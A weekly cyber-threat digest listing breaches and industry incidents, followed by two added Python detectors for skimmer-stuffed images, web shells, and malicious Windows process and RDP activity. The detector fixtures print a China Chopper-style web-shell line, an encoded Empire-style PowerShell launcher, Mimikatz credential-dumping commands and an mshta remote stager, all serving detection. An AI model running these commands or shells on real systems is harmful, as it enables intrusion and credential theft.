18 March 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Cybozu Office
Adobe Animate
Microsoft Exchange Server Enterprise
Leptonica
MyBB Forum Software
Deep & Dark Web
Name Heat 7
Microsoft Exchange Server Enterprise
WordPress
Debian
Microsoft Internet Explorer
Social Warfare

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company | Information | Affected
Molson Coors Beverage (US) | The company disclosed that its brewing, production, and shipping operations have been impacted by a cyberattack. BleepingComputer reported that multiple anonymous sources in the cybersecurity industry informed them that the incident was a ransomware attack. | Unknown
Government of the Philippines | The CyberPH for Human Rights group claimed responsibility for a DDoS attack against the government’s website, which took place on March 10th, 2021. The attack was reportedly carried out to protest the country’s worsening human rights situation. The attackers claim to have stolen unspecified data. | Unknown
Trillium Community Health Plan (US) | The company reported that some of its data was affected in the breach of its third-party file transfer appliance, Accellion FTA. Potentially exposed data includes contact information, insurance ID numbers, dates of birth, and health information. | Unknown
Southern Illinois University School of Medicine (US) | Some of the university’s data was affected in the breach of its third-party file transfer appliance, Accellion FTA. Affected SIU data may contain patient names, dates of birth, Social Security numbers, driver’s licenses, treatments, and insurance information. | Unknown
Flink (Germany) | Zerforschung researchers discovered an exposed server belonging to the delivery service. Data held on the compromised server included customer names, addresses, telephone numbers, e-mail addresses, the last four digits of their stored credit cards, and more. | Unknown
Canada Revenue Agency | The CRA is locking users out of their online accounts as a precautionary measure after malicious actors were found to have obtained user IDs and passwords. The agency stated that the compromise was not the result of a CRA breach and that the credentials were likely obtained via email phishing schemes or third-party data breaches. | 800,000
Mobile Anaesthesiologists (US) | The company is informing its patients of a data breach that took place sometime before December 14th, 2020. The breach allowed an unauthorised individual to possibly acquire some of the company’s data, including full names, health insurance information, and more. | Unknown
Security Industry Specialists (US) | An investigation into a ransomware attack on its systems on June 1st, 2020 revealed that the personal information of individuals was present in the folders accessed by the attackers. This includes names or other personal identifiers combined with financial account numbers or credit and debit card numbers, as well as account access codes and more. | 36,762
St Bernards Total Life Healthcare (US) | PeakTPA informed TLH of a ransomware attack that took place around December 28th, 2020. The data of TLH participants was reportedly accessed in the incident, including names, dates of birth, addresses, Social Security numbers, and diagnosis codes. | Unknown
Preferred Home Care of New York (US) | The home care agency informed individuals of a data breach that took place on January 8th, 2021. Potentially accessed data includes names, emails, financial information, Social Security numbers, medical information, and more. According to DataBreaches[.]net, the company was listed on the Sodinokibi ransomware leak site. | 92,283
Overseas Service Corporation (US) | The company disclosed a phishing email incident involving a ‘small number’ of its email accounts. The attack resulted in unauthorised access to information within these accounts, including names alongside Social Security numbers, financial and payment card numbers, driver’s license numbers, and limited medical information. | Unknown
WeLeakInfo | A hacker forum user claimed to have registered one of WeLeakInfo’s domains after the FBI let it expire and that they were able to obtain customer data. This allegedly includes partial credit card data, full names, email addresses, physical addresses, payment amounts, and more. | Unknown
Bureau of Customs (Philippines) | The actor Pinoy Clownsec compromised the BOC in an SQL injection attack. Members of the group gained access to a database containing over 366,000 sensitive records of individuals who have sent packages to the Philippines. The database was subsequently accessed by another actor, known as Phantom Troupe, who allegedly patched the vulnerabilities affecting the server. Pinoy Clownsec claims that the database is still compromised. | Unknown
Fastway Couriers (Ireland) | The Irish branch of the delivery company was targeted in a cyberattack identified on February 25th, 2021. The incident compromised the data of parcel recipients, including names, addresses and contact details for customers between mid-January and mid-February 2021. | 446,143
Child Focus (US) | The Ohio-based children and family support non-profit was targeted in an attack involving malware that compromised customer names, dates of birth, Social Security and Medicaid numbers, and health information. | 2,716
New London Hospital (US) | The New Hampshire hospital was compromised in an unauthorised access incident in July 2020. A file containing patient names, limited demographic information, and Social Security numbers may have been copied by the intruder. | 34,878
PeakTPA (US) | The elderly care company identified a Netwalker ransomware attack against its servers on December 31st, 2020. Data stolen from two cloud servers may have included Social Security numbers, full names, addresses, and medical treatment information for 50,000 patients. | Unknown
KLS Capital Ltd (Israel) | Black Shadow hackers announced that they had hacked the servers of the car financing company. The group proceeded to expose data such as identity cards, letters, invoices and the personal information of the company’s CEO Omer Maman. | Unknown
Unknown | The Sodin gang alleged that nine entities have recently been compromised by Sodinokibi ransomware. The purported victims include two law firms, an insurance company, an architectural firm, a construction company, and an agricultural cooperative, all based in the US, as well as two international banks and a European manufacturer. The actor published evidence stolen from the alleged victims, including file directories, partial customer lists, customer quotes, copies of contracts and several official IDs. | Unknown
Guns[.]com (US) | A hacker forum user leaked a database attributed to the gun marketplace. The database includes user emails, addresses, full names, phone numbers, some bank account details, and more. The leak also contains the WordPress, MySQL, and Azure Cloud credentials for the site’s administrators in plain text. The site acknowledged the breach, blaming it on third-party vendors. | 400,000
Services Australia | The agency sent an email containing details of a Cashless Debit Card scheme to Northern Territory businesses. Recipient addresses were exposed as they were mistakenly included in the CC rather than the BCC field. | 600
Metro Presort (US) | A renewed investigation into a ransomware attack against the company in 2019 found that names, addresses, patient and health plan IDs or account numbers, and more could potentially have been accessed. | 38,387
Mimecast (UK) | The company disclosed that the actor responsible for the SolarWinds attack accessed its production grid environment. The intruder accessed certain Mimecast-issued certificates and related customer server connection information, a subset of email addresses, and encrypted and/or hashed and salted credentials. | Unknown
Zhaopin, Liepin and 51Job (China) | The online job recruitment firms were found to allow paid corporate accounts to download resumes without the consent or awareness of the individuals. The resumes were then sold on social media QQ groups involved in illegally selling information and used by scammers. | Unknown
Colorado Retina Associates (US) | The eye care clinic was targeted in a phishing attack discovered on January 12th, 2021. The actor copied the contents of two user accounts containing patients’ contact information, dates of birth, clinical data, and a small number of Social Security numbers, driver’s licenses, and payment details. | 26,609
Aljex (US) | Website Planet researchers discovered an exposed, misconfigured AWS S3 bucket belonging to the transportation management software company. The bucket contained shipment details with sensitive origin and recipient data, details of employees and sales representatives, as well as client names, phone numbers, and more. | 4,000
Coleman Group (UK) | The group suffered a cyberattack on the weekend of February 20th, 2021, during which some of its human resources and payroll files may have been accessed. The impacted files contain names, addresses, social insurance numbers and banking information relating to current and former employees. | Unknown
Fiserv (US) | The company found five clients for which auto-generated emails to their customers included a placeholder URL. This resulted in some customers receiving emails from Cashedge[.]com, Netspend[.]com, TCF National Bank, and Union Bank, which exposed customer data. For Cashedge[.]com, this included plan IDs, amounts being transferred, last four digits of account numbers, email addresses, and more. | Unknown
Nikkei China | Multiple incidents of unauthorised access to some email accounts were discovered, with the incidents believed to have begun in October 2020. Potentially impacted data includes names, email addresses, company names, addresses and phone numbers. In 24 instances, credit card information of corporate customers may also have been affected. | Unknown

Threat Actor mentions in Critical Infrastructure

Time-series chart (not reproduced here) of the trending Threat Actors related to Critical Infrastructure over the last week.

Weekly Industry View

Industry View
Industry | Information
Retail & Hospitality | Sucuri researchers observed a Magento 2 store compromise which used a malicious injection to capture POST data from site visitors on the checkout page. The injection encoded the captured data and saved it to a JPG file. According to the researchers, this allowed the attacker to keep the stolen data in a seemingly benign file and download it at their convenience. The injection could capture information submitted on the checkout page, including full names and addresses, payment card details, telephone numbers, as well as email addresses if the user was logged in.
Government | Cofense researchers observed a new email phishing campaign impersonating the US Internal Revenue Service. The email references an application form for the American Rescue Plan and asks the user to download an Excel spreadsheet from Dropbox. Upon opening, the user is asked to enable macros. The researchers note that the macros do not directly download malware or run a PowerShell script, but instead drop an XSL file to disk and then use a WMI query to obtain system information. JavaScript contained in the XSL file is then executed via WMI and the banking trojan Dridex is downloaded.
Critical Infrastructure | McAfee researchers observed a new espionage campaign, dubbed Operation Diànxùn, targeting telecommunications companies in Southeast Asia, Europe and the US. A strong interest in German, Vietnamese and Indian companies was identified. The initial attack vector is not yet known, but is believed to involve an attacker-controlled domain hosting phishing websites that masquerade as the Huawei careers page. The final payload includes a backdoor for remote control and Cobalt Strike Beacon. The techniques used in the campaign resemble previous campaigns by RedDelta and Mustang Panda, though no use of PlugX was observed. The researchers assess with medium confidence that the campaign is related to the ongoing bans on Chinese technology in the global 5G roll-out.
Technology | Kaspersky researchers warned that the threat actors responsible for the Lemon_Duck crypto-mining botnet are ‘massively hitting’ vulnerable Microsoft Exchange Servers via ProxyLogon exploits. Following exploitation, the group downloads malicious payloads onto the servers via web shells. While examining Microsoft Exchange Server exploitation, Huntress Labs also identified indicators of compromise linked to the malware, which installs the XMRig Monero CPU miner on compromised devices.
Education | On March 16th, 2021, the Federal Bureau of Investigation (FBI) warned educational institutions in the UK and US of a rise in PYSA ransomware attacks. The FBI stated that the attackers have been targeting K-12 schools, seminaries, and higher education institutions. The threat actors often gain initial access via Remote Desktop Protocol (RDP) attacks and phishing before using tools such as PowerShell Empire, Mimikatz, and Koadic for further access. Prior to encrypting files, the attackers exfiltrate files which often include financial and employment data.
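The Magento skimmer in the Retail & Hospitality row and the Exchange web shells in the Technology row both leave files in the web root whose contents do not match what their names claim: a ‘JPG’ that holds base64-encoded checkout data, and an ‘.aspx’ page that is really a command shell. The Python sweep below is an added example written for this digest, not code from Sucuri, Kaspersky, Huntress or Silobreaker. The magic-byte table, the base64 run length, the web-shell indicator patterns and weights, and the sample files it creates are all assumptions constructed for illustration; the ProxyLogon-era shells it models are the China Chopper-style `eval(Request[...], "unsafe")` pages.

```python
"""Added example: sweep a web root for files that carry data or code they
should not. Two checks, both illustrative assumptions rather than the
vendors' published indicators:
  1. image files whose bytes are not an image, or a valid JPEG followed by a
     base64 blob after the end-of-image marker (the skimmer pattern Sucuri
     describes for the Magento 2 compromise); and
  2. .aspx pages with China Chopper-style web-shell constructs of the kind
     dropped on Exchange servers after ProxyLogon exploitation.
"""
import base64
import re
import tempfile
from pathlib import Path

# Header bytes a file with this extension must begin with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
JPEG_EOI = b"\xff\xd9"  # end-of-image marker; a well-formed JPEG ends here

# 160+ base64 characters in a row (4-char groups, optional padding) count as a payload.
B64_RUN = re.compile(rb"(?:[A-Za-z0-9+/]{4}){40,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")

# Web-shell indicators and their weights (assumed for this example).
SHELL_INDICATORS = {
    "eval_of_request": (re.compile(rb"eval\s*\(\s*Request", re.I), 3),
    "jscript_page": (re.compile(rb'Language\s*=\s*"?JScript"?', re.I), 1),
    "unsafe_eval": (re.compile(rb'"unsafe"\s*\)', re.I), 2),
    "process_start": (re.compile(rb"Process\.Start|ProcessStartInfo", re.I), 2),
    "shell_command": (re.compile(rb"cmd(?:\.exe)?\s*/c|powershell", re.I), 2),
}
SHELL_THRESHOLD = 3
WEB_PAGE_EXTENSIONS = (".aspx", ".ashx", ".asmx")


def inspect_image(name, data):
    """Reasons an image file looks like a data drop (empty list = looks fine).
    'bad_magic': header does not match the extension; 'base64_body': the
    file is a base64 blob rather than an image; 'appended_payload': JPEG
    header intact but a base64 run follows the end-of-image marker."""
    magic = IMAGE_MAGIC.get(Path(name).suffix.lower())
    if magic is None:
        return []  # not an image extension; nothing to check here
    reasons = []
    if not data.startswith(magic):
        reasons.append("bad_magic")
        if B64_RUN.search(data):
            reasons.append("base64_body")
        return reasons
    if data.startswith(IMAGE_MAGIC[".jpg"]):
        eoi = data.rfind(JPEG_EOI)
        if eoi != -1 and B64_RUN.search(data[eoi + len(JPEG_EOI):]):
            reasons.append("appended_payload")
    return reasons


def inspect_aspx(name, data):
    """(score, matched indicator names) for an ASP.NET page; (0, []) otherwise."""
    if Path(name).suffix.lower() not in WEB_PAGE_EXTENSIONS:
        return 0, []
    hits = [key for key, (rx, _) in SHELL_INDICATORS.items() if rx.search(data)]
    return sum(SHELL_INDICATORS[key][1] for key in hits), hits


def sweep(root):
    """Walk root and return {relative posix path: finding} for suspicious files."""
    findings = {}
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        reasons = inspect_image(path.name, data)
        if reasons:
            findings[rel] = {"type": "image", "reasons": reasons}
            continue
        score, hits = inspect_aspx(path.name, data)
        if score >= SHELL_THRESHOLD:
            findings[rel] = {"type": "webshell", "score": score, "indicators": hits}
    return findings


def demo():
    """Build a constructed web root (no real site data) and sweep it."""
    fake_record = b'{"cc":"4111111111111111","exp":"12/23","name":"J. Doe","addr":"1 Main St"}'
    blob = base64.b64encode(fake_record * 4)  # what a skimmer might stash
    clean_jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 32 + JPEG_EOI
    files = {
        "media/catalog/banner.jpg": clean_jpeg,
        "media/catalog/product.jpg": clean_jpeg + blob,      # payload after EOI
        "pub/media/wysiwyg/thumb.jpg": blob,                 # not an image at all
        "aspnet_client/healthy.aspx": b'<%@ Page Language="C#" %>\n<html><body>ok</body></html>',
        "owa/auth/errorFF.aspx": (b'<%@ Page Language="JScript"%><script runat="server">'
                                  b'function Page_Load(){eval(Request["orange"],"unsafe");}</script>'),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return sweep(root)


if __name__ == "__main__":
    for rel, finding in demo().items():
        print(rel, finding)
```

Point `sweep()` at a Magento `pub/media` tree or an Exchange `inetpub\wwwroot` tree to run it for real; on a production host, compare the flagged paths against the platform’s shipped file list before acting, since the base64 heuristic will also fire on legitimately embedded data URIs.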

News and information concerning each mentioned industry over the last week.
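The Government row (macro writes an XSL file, its script is executed via WMI) and the Education row (RDP access, then PowerShell Empire, Mimikatz and Koadic) describe tradecraft that process-creation and logon telemetry can catch. The Python below is an added example, not detection content from Cofense, the FBI or Silobreaker. The Sysmon-style process events and Security 4625 logon failures are constructed for the example; the WMIC `/format:` route for executing an XSL file’s script is assumed as the usual way that step is performed, and the Empire launcher flags, Mimikatz module names, mshta stager pattern and RDP failure threshold are illustrative approximations rather than vendor indicators.

```python
"""Added example: detection rules over constructed Windows telemetry for the
two chains in this digest (Office -> XSL -> WMI script execution; RDP brute
force -> Empire / Mimikatz / Koadic). Events and rules are this example's
own assumptions, not published indicators."""
import re
from collections import Counter

# Sysmon Event ID 1 style records, constructed for the example.
PROCESS_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'wmic os get /format:"C:\Users\jdoe\AppData\Local\Temp\form.xsl"'},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -NoP -sta -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 3, "image": r"C:\Users\Public\mimikatz.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"id": 4, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta http://198.51.100.23:9999/abc"},   # documentation-range IP
    {"id": 5, "image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 6, "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic logicaldisk get size,freespace,caption"},  # benign admin use
]

# Security Event ID 4625 (failed logon) style records; logon type 10 = RDP.
LOGON_EVENTS = (
    [{"event_id": 4625, "logon_type": 10, "src_ip": "203.0.113.7", "user": f"admin{i}"} for i in range(12)]
    + [{"event_id": 4625, "logon_type": 10, "src_ip": "192.0.2.44", "user": "jdoe"},
       {"event_id": 4625, "logon_type": 2, "src_ip": "-", "user": "jdoe"},
       {"event_id": 4624, "logon_type": 10, "src_ip": "192.0.2.44", "user": "jdoe"}]
)

OFFICE_APPS = re.compile(r"\\(winword|excel|powerpnt|outlook)\.exe$", re.I)
LOLBINS = re.compile(r"\\(wmic|mshta|regsvr32|rundll32|powershell|cmd|wscript|cscript)\.exe$", re.I)
MIMIKATZ_MODULES = re.compile(r"(sekurlsa|lsadump|privilege|kerberos)::", re.I)
EMPIRE_LAUNCHER = re.compile(r"-NoP\b.*-NonI\b.*-W\s+Hidden\b.*-Enc\b", re.I)  # classic Empire stager flags


def wmic_loads_xsl(event):
    """WMIC /format: pointing at a file path or URL, not a built-in format name.
    Built-in formats are bare words; a path or URL means an XSL from disk/web."""
    if not re.search(r"\\wmic\.exe$", event["image"], re.I):
        return False
    m = re.search(r'/format:\s*"?([^"\s]+)', event["cmdline"], re.I)
    return bool(m and re.search(r"[\\/]|\.xsl$", m.group(1), re.I))


RULES = [
    ("office_spawns_lolbin", lambda e: bool(OFFICE_APPS.search(e["parent"]) and LOLBINS.search(e["image"]))),
    ("wmic_xsl_format", wmic_loads_xsl),
    ("empire_style_launcher", lambda e: bool(EMPIRE_LAUNCHER.search(e["cmdline"]))),
    ("mimikatz_modules", lambda e: bool(MIMIKATZ_MODULES.search(e["cmdline"]))),
    ("mshta_remote_stager", lambda e: bool(re.search(r"\\mshta\.exe$", e["image"], re.I)
                                           and re.search(r"https?://", e["cmdline"], re.I))),
]


def detect(events):
    """Return [(event id, rule name)] for every rule that fires, in rule order."""
    return [(e["id"], name) for e in events for name, pred in RULES if pred(e)]


def rdp_bruteforce_sources(events, threshold=10):
    """Source IPs with at least `threshold` failed RDP (type 10) logons.
    Callers should pass events already limited to a time window of interest."""
    counts = Counter(e["src_ip"] for e in events
                     if e["event_id"] == 4625 and e["logon_type"] == 10)
    return {ip for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for event_id, rule in detect(PROCESS_EVENTS):
        print(f"event {event_id}: {rule}")
    print("RDP brute-force sources:", rdp_bruteforce_sources(LOGON_EVENTS))
```

Event 1 trips two rules at once (Excel spawning a LOLBin, and WMIC loading a format file from disk), which is the kind of stacked signal worth alerting on even when each rule alone is noisy; event 6 shows ordinary `wmic` inventory use passing untouched. The RDP rule is deliberately a plain count so that the threshold and window can be tuned to the host’s baseline.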
